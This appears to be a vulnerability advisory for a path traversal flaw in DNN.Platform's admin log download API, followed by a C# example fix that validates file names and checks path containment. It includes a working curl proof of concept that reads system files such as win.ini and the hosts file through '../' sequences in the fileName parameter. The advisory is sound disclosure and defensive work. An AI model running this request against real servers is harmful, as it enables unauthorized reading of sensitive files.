Path traversal on administrative account in dnnsoftware/dnn.platform
Aug 9th 2022
Relative path traversal in the log download functionality of DNN.Platform. An administrative account can download any system file. This could allow direct read access to files that are not meant to be accessible directly through the platform.
Proof of Concept
Log in as an administrative user. The payload was tested on DNN 9.1.1.
curl -i -s -k -X $'GET' \
    -H $'Host: <HOST>' \
    -b $'.DOTNETNUKE=<ADMIN_SESSION>' \
    $'https://<HOST>/<PATH_TO_DNN>/API/PersonaBar/ServerSettingsLogs/GetLogFile?fileName=../../../../../../Windows/win.ini'
Replace <HOST>, <ADMIN_SESSION> and <PATH_TO_DNN> with the appropriate values. <PATH_TO_DNN> may include the language selection. Files other than Windows/win.ini may be leaked, such as windows/system32/drivers/etc/hosts. Adjust the number of "../" sequences depending on the local configuration.
Arbitrary file read. This could leak sensitive system files or any file present on the system.
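One way to close this class of bug in a file-download handler, shown as an added example and not DNN's own code or its actual fix: accept only a bare file name, canonicalize it, and require the result to stay inside the log directory. LogFileResolver, the logDirectory parameter and the sample file names are hypothetical.

```csharp
using System;
using System.IO;

// Added example, not DNN's code. LogFileResolver and logDirectory are hypothetical.
public static class LogFileResolver
{
    // Returns the full path of a file inside logDirectory, or throws when the
    // requested name would resolve anywhere else on disk.
    public static string Resolve(string logDirectory, string fileName)
    {
        if (string.IsNullOrWhiteSpace(fileName))
            throw new ArgumentException("File name is required.", nameof(fileName));

        // A log file name never needs a directory part. Reject separators and
        // dot segments outright instead of trying to strip them.
        if (fileName.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0 ||
            fileName.IndexOf('/') >= 0 || fileName.IndexOf('\\') >= 0 ||
            fileName == "." || fileName == "..")
            throw new UnauthorizedAccessException("Invalid log file name.");

        // Second layer: canonicalize both sides and require containment.
        // The trailing separator stops "logs-old" from matching root "logs".
        string root = Path.GetFullPath(logDirectory);
        if (!root.EndsWith(Path.DirectorySeparatorChar.ToString()))
            root += Path.DirectorySeparatorChar;
        string candidate = Path.GetFullPath(Path.Combine(root, fileName));

        if (!candidate.StartsWith(root, StringComparison.OrdinalIgnoreCase))
            throw new UnauthorizedAccessException("Path escapes the log directory.");
        return candidate;
    }

    public static void Main()
    {
        // Constructed sample directory and inputs for the demonstration.
        string logs = Path.Combine(Path.GetTempPath(), "log-demo");
        Directory.CreateDirectory(logs);
        string[] names = { "app.log", "../../../../../../Windows/win.ini", "..\\web.config" };
        foreach (string name in names)
        {
            try { Console.WriteLine("allowed:  " + Resolve(logs, name)); }
            catch (UnauthorizedAccessException e)
            { Console.WriteLine("rejected: " + name + " (" + e.Message + ")"); }
        }
    }
}
```

The fileName value from the proof of concept is rejected by the separator check before any file system access happens; the containment check remains as a backstop if the name filter is later relaxed.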